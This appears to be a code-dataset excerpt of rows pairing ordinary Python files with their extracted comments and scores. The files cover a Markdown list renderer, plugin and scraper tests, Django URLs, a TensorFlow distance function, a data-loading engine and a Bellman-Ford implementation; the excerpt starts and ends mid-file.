"""Rendering list tags like ``<ul>`` and ``<ol>``.
:param body: body contents of the list.
:param offset: start offset of the list or None if not present
:param ordered: whether this list is ordered or not.
:return String: listblock as HTML
"""
tag = 'ul'
if ordered:
tag = 'ol'
if isinstance(offset,str) and offset:
tag += ' start="'+ offset +'"'
return '<%s>\n%s</%s>\n' % (tag, body, tag)
def list_item(self, text):
"""
Rendering list item snippet. Like ``<li>``.
adds tasklist support
return: String - listitem as HTML
"""
checkbox = ""
# if listitem begins with an [ xX]
if re.match(r'^\[([ Xx])\]\s(.*)', text):
# if listitem begins with [ ]
if re.match(r'^\[([\s])\]',text):
# checkbox is not checked
checkbox = '<input disabled="" type="checkbox">'
# removes [ ] from listitem
text = text.replace('[ ]','',1)
# if listitem begins with [x] or [X]
if re.match(r'^\[([Xx])\]',text):
# checkbox is checked
checkbox = '<input checked="" disabled="" type="checkbox">'
# removes [Xx]
text = re.sub('\[([Xx])\]','',text,1)
return '<li>%s%s</li>\n' % (checkbox, text)
class CustomMarkdown(Markdown):
"""
prep for returning list as html
calls custom renderer
return: String - parsed markdown list as html
"""
def output_list(self):
ordered = self.token['ordered']
off = self.token.get('offset')
body = self.renderer.placeholder()
while self.pop()['type'] != 'list_end':
body += self.tok()
return self.renderer.list(body, off, ordered)
| en | 0.709518 | ' Copyright (c) 2014 - 2015, <NAME> All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the creator nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. custom mistune blocklexer adds functionality for offset list items # get the list number if starting higher than 1 custom markdown renderer for support offset and task lists Rendering list tags like ``<ul>`` and ``<ol>``. :param body: body contents of the list. :param offset: start offset of the list or None if not present :param ordered: whether this list is ordered or not. :return String: listblock as HTML Rendering list item snippet. Like ``<li>``. 
adds tasklist support return: String - listitem as HTML # if listitem begins with an [ xX] # if listitem begins with [ ] # checkbox is not checked # removes [ ] from listitem # if listitem begins with [x] or [X] # checkbox is checked # removes [Xx] prep for returning list as html calls custom renderer return: String - parsed markdown list as html | 1.893334 | 2 |
tests/test_templates.py | mwort/modelmanager | 1 | 6623899 | """Test module for the Templates plugin."""
import unittest
import os
import cProfile, pstats
import test_project
test_project.TEST_SETTINGS += """
from modelmanager.plugins import templates
from modelmanager.plugins.templates import TemplatesDict as _TemplatesDict
from modelmanager import utils
@utils.propertyplugin
class params(_TemplatesDict):
template_patterns = ['param.txt']
"""
TEST_TEMPLATES = {'input/test_param.txt': ("Test parameters\n{n:d} {d:f}",
"Test parameters\n 1 1.1 "),
'input/test_config.pr': ("parameters {test}\n{time}\n{n:d}",
"parameters XYZ \n2000-01-01\n1")}
class TestTemplates(test_project.ProjectTestCase):
def setUp(self):
super(TestTemplates, self).setUp()
self.assertTrue(hasattr(self.project, 'templates'))
self.templates = self.project.templates
os.mkdir(os.path.join(self.project.projectdir, 'input'))
os.mkdir(os.path.join(self.templates.resourcedir, 'input'))
for p, (tmplt, tfile) in TEST_TEMPLATES.items():
with open(os.path.join(self.templates.resourcedir, p), 'w') as f:
f.write(tmplt)
with open(os.path.join(self.project.projectdir, p), 'w') as f:
f.write(tfile)
return
def test_get_template(self):
for i in ['param', 'config', 'input/*config*']:
tmplt = self.templates.get_template(i)
self.assertIn(os.path.relpath(tmplt.filepath, self.projectdir),
TEST_TEMPLATES)
self.assertEqual(len(self.templates.get_templates('input/*')), 2)
def test_read_values(self):
self.assertEqual(self.templates('n'), 1)
self.assertEqual(self.templates('d'), 1.1)
self.assertEqual(self.templates('test'), "XYZ")
self.assertRaises(KeyError, self.templates, "unknown")
config = self.templates['config']
# return value only
self.assertEqual(config.read_values('test'), 'XYZ')
# return dict
d = config.read_values('test', 'time')
self.assertEqual(d['time'], '2000-01-01')
self.assertRaises(KeyError, config.read_values, 'unknown')
def test_write_values(self):
self.templates(n=100)
self.assertEqual(self.templates('n'), 100)
self.templates(d=1.111)
self.assertEqual(self.templates('d'), 1.111)
self.templates(test='Somelongstr')
self.assertEqual(self.templates('test'), "Somelongstr")
self.assertRaises(KeyError, self.templates, unknown=1)
param = self.templates['param']
self.assertRaises(KeyError, param.write_values, unknown=1)
def test_subset(self):
self.assertEqual(self.templates('n', templates='config'), 1)
self.templates(n=2, templates=['config'])
self.assertEqual(self.templates('n', templates='param'), 1)
self.assertEqual(self.templates('n', templates='config'), 2)
# value from template listed first is returned
self.assertEqual(self.templates("n", templates=['config', 'param']), 2)
def test_templates_dict(self):
self.assertEqual(self.project.params['n'], 1)
print(self.project.params)
self.project.params['n'] = 3
self.assertEqual(self.templates('n', templates='param'), 3)
if __name__ == '__main__':
cProfile.run('unittest.main()', 'pstats')
# print profile stats ordered by time
pstats.Stats('pstats').strip_dirs().sort_stats('time').print_stats(5)
| """Test module for the Templates plugin."""
import unittest
import os
import cProfile, pstats
import test_project
test_project.TEST_SETTINGS += """
from modelmanager.plugins import templates
from modelmanager.plugins.templates import TemplatesDict as _TemplatesDict
from modelmanager import utils
@utils.propertyplugin
class params(_TemplatesDict):
template_patterns = ['param.txt']
"""
TEST_TEMPLATES = {'input/test_param.txt': ("Test parameters\n{n:d} {d:f}",
"Test parameters\n 1 1.1 "),
'input/test_config.pr': ("parameters {test}\n{time}\n{n:d}",
"parameters XYZ \n2000-01-01\n1")}
class TestTemplates(test_project.ProjectTestCase):
def setUp(self):
super(TestTemplates, self).setUp()
self.assertTrue(hasattr(self.project, 'templates'))
self.templates = self.project.templates
os.mkdir(os.path.join(self.project.projectdir, 'input'))
os.mkdir(os.path.join(self.templates.resourcedir, 'input'))
for p, (tmplt, tfile) in TEST_TEMPLATES.items():
with open(os.path.join(self.templates.resourcedir, p), 'w') as f:
f.write(tmplt)
with open(os.path.join(self.project.projectdir, p), 'w') as f:
f.write(tfile)
return
def test_get_template(self):
for i in ['param', 'config', 'input/*config*']:
tmplt = self.templates.get_template(i)
self.assertIn(os.path.relpath(tmplt.filepath, self.projectdir),
TEST_TEMPLATES)
self.assertEqual(len(self.templates.get_templates('input/*')), 2)
def test_read_values(self):
self.assertEqual(self.templates('n'), 1)
self.assertEqual(self.templates('d'), 1.1)
self.assertEqual(self.templates('test'), "XYZ")
self.assertRaises(KeyError, self.templates, "unknown")
config = self.templates['config']
# return value only
self.assertEqual(config.read_values('test'), 'XYZ')
# return dict
d = config.read_values('test', 'time')
self.assertEqual(d['time'], '2000-01-01')
self.assertRaises(KeyError, config.read_values, 'unknown')
def test_write_values(self):
self.templates(n=100)
self.assertEqual(self.templates('n'), 100)
self.templates(d=1.111)
self.assertEqual(self.templates('d'), 1.111)
self.templates(test='Somelongstr')
self.assertEqual(self.templates('test'), "Somelongstr")
self.assertRaises(KeyError, self.templates, unknown=1)
param = self.templates['param']
self.assertRaises(KeyError, param.write_values, unknown=1)
def test_subset(self):
self.assertEqual(self.templates('n', templates='config'), 1)
self.templates(n=2, templates=['config'])
self.assertEqual(self.templates('n', templates='param'), 1)
self.assertEqual(self.templates('n', templates='config'), 2)
# value from template listed first is returned
self.assertEqual(self.templates("n", templates=['config', 'param']), 2)
def test_templates_dict(self):
self.assertEqual(self.project.params['n'], 1)
print(self.project.params)
self.project.params['n'] = 3
self.assertEqual(self.templates('n', templates='param'), 3)
if __name__ == '__main__':
cProfile.run('unittest.main()', 'pstats')
# print profile stats ordered by time
pstats.Stats('pstats').strip_dirs().sort_stats('time').print_stats(5)
| en | 0.453656 | Test module for the Templates plugin. from modelmanager.plugins import templates from modelmanager.plugins.templates import TemplatesDict as _TemplatesDict from modelmanager import utils @utils.propertyplugin class params(_TemplatesDict): template_patterns = ['param.txt'] # return value only # return dict # value from template listed first is returned # print profile stats ordered by time | 2.699697 | 3 |
mobify/test/test_histmag.py | macbre/mobify | 5 | 6623900 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import print_function
from . import MobifyTestCase
from mobify.sources.histmag import HistmagPage, HistmagSource
class Histmag(MobifyTestCase):
@staticmethod
def test_is_my_url():
assert not HistmagSource.is_my_url('http://example.com')
assert HistmagSource.is_my_url(
'http://histmag.org/Niech-zyje-car-Wladyslaw-Zygmuntowicz-Cz.-3-Upadek-planow-hetmana-8449')
assert HistmagSource.is_my_url(
'https://histmag.org/czy-powstanie-listopadowe-bylo-skazane-na-porazke-13520')
@staticmethod
def test_extend_url():
assert HistmagSource.extend_url(
'http://histmag.org/Niech-zyje-car-Wladyslaw-Zygmuntowicz-Cz.-3-Upadek-planow-hetmana-8449'
) == 'http://histmag.org/Niech-zyje-car-Wladyslaw-Zygmuntowicz-Cz.-3-Upadek-planow-hetmana-8449'
assert HistmagSource.extend_url(
'http://histmag.org/Margaret-Thatcher-tajfun-reform-7896'
) == 'http://histmag.org/Margaret-Thatcher-tajfun-reform-7896'
assert HistmagSource.extend_url(
'http://histmag.org/zmarl-prof-janusz-tazbir-13257?newsletter=true'
) == 'http://histmag.org/zmarl-prof-janusz-tazbir-13257'
assert HistmagSource.extend_url(
'https://histmag.org/Prawdziwy-powod-wybuchu-I-wojny-swiatowej-9648?ciekawostka'
) == 'https://histmag.org/Prawdziwy-powod-wybuchu-I-wojny-swiatowej-9648'
class HistmagBeniowski(MobifyTestCase):
_source = None
def setUp(self):
# @see https://histmag.org/Maurycy-Beniowski-bunt-na-Kamczatce-13947
self._source = HistmagPage(
url='',
content=self.get_fixture('Maurycy-Beniowski-bunt-na-Kamczatce.html')
)
def test_parsing(self):
assert self._source.get_title() == '<NAME> - bunt na Kamczatce'
assert self._source.get_lead() == u'Po upadku konfederacji barskiej został zesłany na Kamczatkę. Awanturnicza natura nie pozwoliła mu jednak długo zagrzać tam miejsca. Tak <NAME> stanął na czele buntu. Czy wywalczył upragnioną wolność?'
assert self._source.get_author() == u'<NAME>'
assert self._source.get_language() == 'pl'
html = self._source.get_html()
print(html) # failed assert will print the raw HTML
assert '<h1><NAME> - bunt na Kamczatce</h1>' in html
assert '<p><strong>Po upadku konfederacji barskiej' in html
assert u'<p>W październiku 1769 roku Beniowski i Wynbladth uczestniczyć mieli w spisku' in html
assert 'Kamczatka, ilustracja' not in html
assert '<NAME> (1741-1786) (domena publiczna)' not in html
assert u'<h4>Zobacz także:</h4>' not in html
class HistmagChurchill(MobifyTestCase):
_source = None
def setUp(self):
# @see https://histmag.org/Winston-Churchill-lew-Albionu-14521
self._source = HistmagPage(
url='',
content=self.get_fixture('Winston-Churchill-lew-Albionu-14521.html')
)
def test_parsing(self):
assert self._source.get_title() == u'Winston Churchill – lew Albionu'
assert self._source.get_lead() == ''
assert self._source.get_author() == u'<NAME>'
assert self._source.get_language() == 'pl'
html = self._source.get_html()
print(html) # failed assert will print the raw HTML
assert u'<h1>Winston Churchill – lew Albionu</h1>' in html
assert u'<h3>Potomek księcia Marlborough</h3>' in html
assert u'<p><NAME> przyszedł na świat 30 listopada 1874 roku. ' in html
assert u'<h3>Tekst jest fragmentem e-booka <NAME>skiego „Perły imperium brytyjskiego”:</h3>' not in html
| # -*- coding: utf-8 -*-
from __future__ import print_function
from . import MobifyTestCase
from mobify.sources.histmag import HistmagPage, HistmagSource
class Histmag(MobifyTestCase):
@staticmethod
def test_is_my_url():
assert not HistmagSource.is_my_url('http://example.com')
assert HistmagSource.is_my_url(
'http://histmag.org/Niech-zyje-car-Wladyslaw-Zygmuntowicz-Cz.-3-Upadek-planow-hetmana-8449')
assert HistmagSource.is_my_url(
'https://histmag.org/czy-powstanie-listopadowe-bylo-skazane-na-porazke-13520')
@staticmethod
def test_extend_url():
assert HistmagSource.extend_url(
'http://histmag.org/Niech-zyje-car-Wladyslaw-Zygmuntowicz-Cz.-3-Upadek-planow-hetmana-8449'
) == 'http://histmag.org/Niech-zyje-car-Wladyslaw-Zygmuntowicz-Cz.-3-Upadek-planow-hetmana-8449'
assert HistmagSource.extend_url(
'http://histmag.org/Margaret-Thatcher-tajfun-reform-7896'
) == 'http://histmag.org/Margaret-Thatcher-tajfun-reform-7896'
assert HistmagSource.extend_url(
'http://histmag.org/zmarl-prof-janusz-tazbir-13257?newsletter=true'
) == 'http://histmag.org/zmarl-prof-janusz-tazbir-13257'
assert HistmagSource.extend_url(
'https://histmag.org/Prawdziwy-powod-wybuchu-I-wojny-swiatowej-9648?ciekawostka'
) == 'https://histmag.org/Prawdziwy-powod-wybuchu-I-wojny-swiatowej-9648'
class HistmagBeniowski(MobifyTestCase):
_source = None
def setUp(self):
# @see https://histmag.org/Maurycy-Beniowski-bunt-na-Kamczatce-13947
self._source = HistmagPage(
url='',
content=self.get_fixture('Maurycy-Beniowski-bunt-na-Kamczatce.html')
)
def test_parsing(self):
assert self._source.get_title() == '<NAME> - bunt na Kamczatce'
assert self._source.get_lead() == u'Po upadku konfederacji barskiej został zesłany na Kamczatkę. Awanturnicza natura nie pozwoliła mu jednak długo zagrzać tam miejsca. Tak <NAME> stanął na czele buntu. Czy wywalczył upragnioną wolność?'
assert self._source.get_author() == u'<NAME>'
assert self._source.get_language() == 'pl'
html = self._source.get_html()
print(html) # failed assert will print the raw HTML
assert '<h1><NAME> - bunt na Kamczatce</h1>' in html
assert '<p><strong>Po upadku konfederacji barskiej' in html
assert u'<p>W październiku 1769 roku Beniowski i Wynbladth uczestniczyć mieli w spisku' in html
assert 'Kamczatka, ilustracja' not in html
assert '<NAME> (1741-1786) (domena publiczna)' not in html
assert u'<h4>Zobacz także:</h4>' not in html
class HistmagChurchill(MobifyTestCase):
_source = None
def setUp(self):
# @see https://histmag.org/Winston-Churchill-lew-Albionu-14521
self._source = HistmagPage(
url='',
content=self.get_fixture('Winston-Churchill-lew-Albionu-14521.html')
)
def test_parsing(self):
assert self._source.get_title() == u'Winston Churchill – lew Albionu'
assert self._source.get_lead() == ''
assert self._source.get_author() == u'<NAME>'
assert self._source.get_language() == 'pl'
html = self._source.get_html()
print(html) # failed assert will print the raw HTML
assert u'<h1>Winston Churchill – lew Albionu</h1>' in html
assert u'<h3>Potomek księcia Marlborough</h3>' in html
assert u'<p><NAME> przyszedł na świat 30 listopada 1874 roku. ' in html
assert u'<h3>Tekst jest fragmentem e-booka <NAME>skiego „Perły imperium brytyjskiego”:</h3>' not in html | en | 0.514287 | # -*- coding: utf-8 -*- # @see https://histmag.org/Maurycy-Beniowski-bunt-na-Kamczatce-13947 # failed assert will print the raw HTML # @see https://histmag.org/Winston-Churchill-lew-Albionu-14521 # failed assert will print the raw HTML | 2.245521 | 2 |
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/service_status/urls.py | osoco/better-ways-of-thinking-about-software | 3 | 6623901 | """
Django URLs for service status app
"""
from django.conf.urls import url
from openedx.core.djangoapps.service_status.views import celery_ping, celery_status, index
urlpatterns = [
url(r'^$', index, name='status.service.index'),
url(r'^celery/$', celery_status, name='status.service.celery.status'),
url(r'^celery/ping/$', celery_ping, name='status.service.celery.ping'),
]
| """
Django URLs for service status app
"""
from django.conf.urls import url
from openedx.core.djangoapps.service_status.views import celery_ping, celery_status, index
urlpatterns = [
url(r'^$', index, name='status.service.index'),
url(r'^celery/$', celery_status, name='status.service.celery.status'),
url(r'^celery/ping/$', celery_ping, name='status.service.celery.ping'),
]
| en | 0.628141 | Django URLs for service status app | 1.802629 | 2 |
glomtf/pairwisedist.py | Rishit-dagli/GLOM-TensorFlow | 31 | 6623902 | import tensorflow as tf
def pairwise_dist(A, B):
"""Write an algorithm that computes batched the p-norm distance between each pair of two collections of row vectors.
We use the euclidean distance metric.
For a matrix A [m, d] and a matrix B [n, d] we expect a matrix of
pairwise distances here D [m, n]
# Arguments:
A: A tf.Tensor object. The first matrix.
B: A tf.tensor object. The second matrix.
# Returns:
Calculate distance.
# Reference:
[scipy.spatial.distance.cdist](https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.distance.cdist.html)
[tensorflow/tensorflow#30659](https://github.com/tensorflow/tensorflow/issues/30659)
"""
# squared norms of each row in A and B
na = tf.reduce_sum(tf.square(A), 1)
nb = tf.reduce_sum(tf.square(B), 1)
# na as a row and nb as a column vectors
na = tf.reshape(na, [-1, 1])
nb = tf.reshape(nb, [1, -1])
# return pairwise euclidean difference matrix
D = tf.sqrt(tf.maximum(na - 2 * tf.matmul(A, B, False, True) + nb, 0.0))
return D
| import tensorflow as tf
def pairwise_dist(A, B):
"""Write an algorithm that computes batched the p-norm distance between each pair of two collections of row vectors.
We use the euclidean distance metric.
For a matrix A [m, d] and a matrix B [n, d] we expect a matrix of
pairwise distances here D [m, n]
# Arguments:
A: A tf.Tensor object. The first matrix.
B: A tf.tensor object. The second matrix.
# Returns:
Calculate distance.
# Reference:
[scipy.spatial.distance.cdist](https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.distance.cdist.html)
[tensorflow/tensorflow#30659](https://github.com/tensorflow/tensorflow/issues/30659)
"""
# squared norms of each row in A and B
na = tf.reduce_sum(tf.square(A), 1)
nb = tf.reduce_sum(tf.square(B), 1)
# na as a row and nb as a column vectors
na = tf.reshape(na, [-1, 1])
nb = tf.reshape(nb, [1, -1])
# return pairwise euclidean difference matrix
D = tf.sqrt(tf.maximum(na - 2 * tf.matmul(A, B, False, True) + nb, 0.0))
return D
| en | 0.769396 | Write an algorithm that computes batched the p-norm distance between each pair of two collections of row vectors. We use the euclidean distance metric. For a matrix A [m, d] and a matrix B [n, d] we expect a matrix of pairwise distances here D [m, n] # Arguments: A: A tf.Tensor object. The first matrix. B: A tf.tensor object. The second matrix. # Returns: Calculate distance. # Reference: [scipy.spatial.distance.cdist](https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.distance.cdist.html) [tensorflow/tensorflow#30659](https://github.com/tensorflow/tensorflow/issues/30659) # squared norms of each row in A and B # na as a row and nb as a column vectors # return pairwise euclidean difference matrix | 3.562602 | 4 |
tests/test_search.py | dhinakg/BitSTAR | 6 | 6623903 | <filename>tests/test_search.py
# Copyright 2017 Starbot Discord Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from api import message, plugin
from plugins import search
class TestSearchSuite(unittest.TestCase):
def test_search_empty_msg(self):
msg = message.Message(body="")
msg.command = "google"
result = yield from search.onCommand(msg)
self.assertEqual(type(result), type(msg))
self.assertEqual(result.body, 'I need a topic to search for!')
def test_search_google(self):
msg = message.Message(body="hello world")
msg.command = "google"
result = yield from search.onCommand(msg)
self.assertEqual(type(result), type(msg))
print(result)
self.assertEqual(result.body, 'Google search: https://www.google.com/#q=hello%20world')
def test_search_duck_duck_go(self):
msg = message.Message(body="hello world")
msg.command = "duckduckgo"
result = yield from search.onCommand(msg)
self.assertEqual(type(result), type(msg))
self.assertEqual(result.body, "DuckDuckGo search: https://www.duckduckgo.com/?q=hello%20world")
def test_search_bing(self):
msg = message.Message(body="hello world")
msg.command = "bing"
result = yield from search.onCommand(msg)
self.assertEqual(type(result), type(msg))
self.assertEqual(result.body, "Bing search: https://www.bing.com/?q=hello%20world")
| <filename>tests/test_search.py
# Copyright 2017 Starbot Discord Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from api import message, plugin
from plugins import search
class TestSearchSuite(unittest.TestCase):
def test_search_empty_msg(self):
msg = message.Message(body="")
msg.command = "google"
result = yield from search.onCommand(msg)
self.assertEqual(type(result), type(msg))
self.assertEqual(result.body, 'I need a topic to search for!')
def test_search_google(self):
msg = message.Message(body="hello world")
msg.command = "google"
result = yield from search.onCommand(msg)
self.assertEqual(type(result), type(msg))
print(result)
self.assertEqual(result.body, 'Google search: https://www.google.com/#q=hello%20world')
def test_search_duck_duck_go(self):
msg = message.Message(body="hello world")
msg.command = "duckduckgo"
result = yield from search.onCommand(msg)
self.assertEqual(type(result), type(msg))
self.assertEqual(result.body, "DuckDuckGo search: https://www.duckduckgo.com/?q=hello%20world")
def test_search_bing(self):
msg = message.Message(body="hello world")
msg.command = "bing"
result = yield from search.onCommand(msg)
self.assertEqual(type(result), type(msg))
self.assertEqual(result.body, "Bing search: https://www.bing.com/?q=hello%20world")
| en | 0.827401 | # Copyright 2017 Starbot Discord Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #q=hello%20world') | 2.917053 | 3 |
exploration/scripts/nbconverted/latent_offset_bool.py | greenelab/Pseudomonas_latent_spaces | 0 | 6623904 |
# coding: utf-8
# In[1]:
#-------------------------------------------------------------------------------------------------------------------------------
# By <NAME> (July 2018)
#
# Take the average of the encoded gene expression for the two experimental conditions
# Take the difference of the averages -- this will be the offset for the latent space
#-------------------------------------------------------------------------------------------------------------------------------
import os
import pandas as pd
import numpy as np
randomState = 123
from numpy.random import seed
seed(randomState)
# In[2]:
# load arguments
encodedA_file = os.path.join(os.path.dirname(os.getcwd()), "encoded", "cipro_treatment", "train_treat_2layer_10latent_encoded.txt")
encodedB_file = os.path.join(os.path.dirname(os.getcwd()), "encoded", "cipro_treatment", "train_control_2layer_10latent_encoded.txt")
# output files
out_file = os.path.join(os.path.dirname(os.getcwd()), "data", "cipro_treatment", "train_offset_2layer_10latent.txt")
# In[3]:
# read in data
encodedA_data = pd.read_table(encodedA_file, header=0, sep='\t', index_col=0)
encodedB_data = pd.read_table(encodedB_file, header=0, sep='\t', index_col=0)
encodedA_data.head(5)
# In[4]:
# Average gene expression across samples in training set
train_A_mean = encodedA_data.mean(axis=0)
train_B_mean = encodedB_data.mean(axis=0)
train_A_mean
# In[5]:
train_B_mean
# In[6]:
# Generate offset using average gene expression in original dataset
train_offset_latent = train_A_mean - train_B_mean
train_offset_latent_df = pd.Series.to_frame(train_offset_latent).transpose()
train_offset_latent_df
# In[7]:
# output
train_offset_latent_df.to_csv(out_file, sep='\t')
|
# coding: utf-8
# In[1]:
#-------------------------------------------------------------------------------------------------------------------------------
# By <NAME> (July 2018)
#
# Take the average of the encoded gene expression for the two experimental conditions
# Take the difference of the averages -- this will be the offset for the latent space
#-------------------------------------------------------------------------------------------------------------------------------
import os
import pandas as pd
import numpy as np
randomState = 123
from numpy.random import seed
seed(randomState)
# In[2]:
# load arguments
encodedA_file = os.path.join(os.path.dirname(os.getcwd()), "encoded", "cipro_treatment", "train_treat_2layer_10latent_encoded.txt")
encodedB_file = os.path.join(os.path.dirname(os.getcwd()), "encoded", "cipro_treatment", "train_control_2layer_10latent_encoded.txt")
# output files
out_file = os.path.join(os.path.dirname(os.getcwd()), "data", "cipro_treatment", "train_offset_2layer_10latent.txt")
# In[3]:
# read in data
encodedA_data = pd.read_table(encodedA_file, header=0, sep='\t', index_col=0)
encodedB_data = pd.read_table(encodedB_file, header=0, sep='\t', index_col=0)
encodedA_data.head(5)
# In[4]:
# Average gene expression across samples in training set
train_A_mean = encodedA_data.mean(axis=0)
train_B_mean = encodedB_data.mean(axis=0)
train_A_mean
# In[5]:
train_B_mean
# In[6]:
# Generate offset using average gene expression in original dataset
train_offset_latent = train_A_mean - train_B_mean
train_offset_latent_df = pd.Series.to_frame(train_offset_latent).transpose()
train_offset_latent_df
# In[7]:
# output
train_offset_latent_df.to_csv(out_file, sep='\t')
| en | 0.449494 | # coding: utf-8 # In[1]: #------------------------------------------------------------------------------------------------------------------------------- # By <NAME> (July 2018) # # Take the average of the encoded gene expression for the two experimental conditions # Take the difference of the averages -- this will be the offset for the latent space #------------------------------------------------------------------------------------------------------------------------------- # In[2]: # load arguments # output files # In[3]: # read in data # In[4]: # Average gene expression across samples in training set # In[5]: # In[6]: # Generate offset using average gene expression in original dataset # In[7]: # output | 2.312145 | 2 |
public-engines/kaggle-titanic-engine/marvin_titanic_engine/data_handler/acquisitor_and_cleaner.py | tallandroid/incubator-marvin | 101 | 6623905 | #!/usr/bin/env python
# coding=utf-8
"""AcquisitorAndCleaner engine action.
Use this module to add the project main code.
"""
import pandas as pd
from .._compatibility import six
from .._logging import get_logger
from marvin_python_toolbox.common.data import MarvinData
import pandas as pd
from marvin_python_toolbox.engine_base import EngineBaseDataHandler
__all__ = ['AcquisitorAndCleaner']
logger = get_logger('acquisitor_and_cleaner')
class AcquisitorAndCleaner(EngineBaseDataHandler):
def __init__(self, **kwargs):
super(AcquisitorAndCleaner, self).__init__(**kwargs)
def execute(self, params, **kwargs):
train_df = pd.read_csv(MarvinData.download_file("https://s3.amazonaws.com/marvin-engines-data/titanic/train.csv"))
test_df = pd.read_csv(MarvinData.download_file("https://s3.amazonaws.com/marvin-engines-data/titanic/test.csv"))
print ("{} samples to train with {} features...".format(train_df.shape[0], train_df.shape[1]))
print ("{} samples to test...".format(test_df.shape[0]))
self.marvin_initial_dataset = {
'train': train_df,
'test': test_df
}
| #!/usr/bin/env python
# coding=utf-8
"""AcquisitorAndCleaner engine action.
Use this module to add the project main code.
"""
import pandas as pd
from .._compatibility import six
from .._logging import get_logger
from marvin_python_toolbox.common.data import MarvinData
import pandas as pd
from marvin_python_toolbox.engine_base import EngineBaseDataHandler
__all__ = ['AcquisitorAndCleaner']
logger = get_logger('acquisitor_and_cleaner')
class AcquisitorAndCleaner(EngineBaseDataHandler):
def __init__(self, **kwargs):
super(AcquisitorAndCleaner, self).__init__(**kwargs)
def execute(self, params, **kwargs):
train_df = pd.read_csv(MarvinData.download_file("https://s3.amazonaws.com/marvin-engines-data/titanic/train.csv"))
test_df = pd.read_csv(MarvinData.download_file("https://s3.amazonaws.com/marvin-engines-data/titanic/test.csv"))
print ("{} samples to train with {} features...".format(train_df.shape[0], train_df.shape[1]))
print ("{} samples to test...".format(test_df.shape[0]))
self.marvin_initial_dataset = {
'train': train_df,
'test': test_df
}
| en | 0.416394 | #!/usr/bin/env python # coding=utf-8 AcquisitorAndCleaner engine action. Use this module to add the project main code. | 2.490592 | 2 |
ads/graphs_processing/clrs/bellman_ford.py | Aminul-Momin/Algorithms_and_Data_Structures | 0 | 6623906 | <filename>ads/graphs_processing/clrs/bellman_ford.py
from ads.errors.exceptions import NegativeWeightCycleException
from .graphs import Digraph, DGVertex
class BellmanFord(object):
    """
    Single-source shortest paths on an edge-weighted digraph (Bellman-Ford),
    with detection of negative-weight cycles.

    The relaxation passes run on construction.  The outcome of the
    negative-cycle check is exposed as ``self.no_negative_cycle``: True when
    no negative-weight cycle is reachable from the source, False otherwise.

    NOTE: The edge weights can be positive, negative, or zero.
    """

    def __init__(self, G: Digraph, source: DGVertex):
        # Bug fix: the boolean result used to be silently discarded, leaving
        # callers no way to know whether a negative cycle was found.
        self.no_negative_cycle = self._bellman_ford(G, source)

    def _bellman_ford(self, G: Digraph, source: DGVertex) -> bool:
        """Run |V|-1 relaxation passes, then test for negative cycles.

        Args:
            G (Digraph): A directed graph.
            source (DGVertex): the source vertex for the search.

        Returns:
            bool: True if no negative-weight cycle is reachable from source,
            False otherwise.
        """
        # Assumes every non-source vertex starts with distance = +infinity
        # (set by the Digraph/DGVertex constructors) — TODO confirm.
        source.distance = 0
        # After i passes every shortest path using <= i edges is final, so
        # |V|-1 passes suffice for any simple shortest path.
        for _ in range(G.V() - 1):
            for u in G:
                for v in u.neighbors():
                    self.relax(u, v)
        # If any edge can still be relaxed, a reachable negative-weight
        # cycle must exist.
        for u in G:
            for v in u.neighbors():
                if v.distance > u.distance + u.adj[v]:
                    return False
        return True

    def relax(self, u, v):
        """Relax the edge (u, v): lower v's distance if going through u is shorter.

        Args:
            u: a vertex, predecessor of v
            v: a vertex, descendant of u
        """
        # Shortest distance so far: d(s, v) = distance[u] + weight(u, v)
        if v.distance > u.distance + u.adj[v]:
            v.distance = u.distance + u.adj[v]
            v.parent = u
| <filename>ads/graphs_processing/clrs/bellman_ford.py
from ads.errors.exceptions import NegativeWeightCycleException
from .graphs import Digraph, DGVertex
class BellmanFord(object):
"""
